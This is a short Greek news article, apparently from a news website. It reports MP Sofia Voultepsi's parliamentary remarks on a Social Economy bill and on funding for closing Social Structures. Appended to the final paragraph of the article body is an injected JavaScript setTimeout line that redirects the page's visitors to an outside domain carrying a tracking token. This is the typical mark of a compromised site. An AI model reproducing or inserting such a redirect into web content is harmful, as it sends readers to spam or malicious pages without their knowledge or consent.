Βούλτεψη: Στις Κοινωνικές Δομές που κλείνουν να πάει μέρος των χρημάτων από τα κανάλια

0
6

 

Μιλώντας στη Βουλή, στο πλαίσιο της συζήτησης του νομοσχεδίου για την Κοινωνική Οικονομία, η βουλευτής της Νέας Δημοκρατίας, Σοφία Βούλτεψη κάλεσε τον πρωθυπουργό να δώσει μέρος του ποσού που πήρε από την πρώτη δόση από τα κανάλια στις Κοινωνικές Δομές που, όπως είπε, κλείνουν από την 1η Νοεμβρίου.

Αναφορικά με το νομοσχέδιο η κυρία Βούλτεψη υπογράμμισε ότι η ΝΔ το ψηφίζει επί της αρχής και χαιρέτησε την ευρεία συναίνεση που επιτεύχθηκε στη Βουλή και την διάθεση συνεργασίας από μέρους της αναπληρώτριας υπουργού κ. Αντωνοπούλου ώστε να ενσωματωθούν οι περισσότερες από τις προτάσεις των κομμάτων και των φορέων.

Επιπλέον, η Σοφία Βούλτεψη επισήμανε την ανάγκη ο Νόμος αυτός να μην έχει την τύχη του προηγούμενου και να εφαρμοστεί, δεδομένου ότι στις υπόλοιπες χώρες του κόσμου η Κοινωνική Οικονομία, τρίτος τομέας της Οικονομίας, δίπλα στον Δημόσιο και Ιδιωτικό, παράγει ακόμη και το 10% του ΑΕΠ- κάτι που η Ελλάδα έχει απόλυτη ανάγκη, όπως υποστήριξε η βουλευτής της ΝΔ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here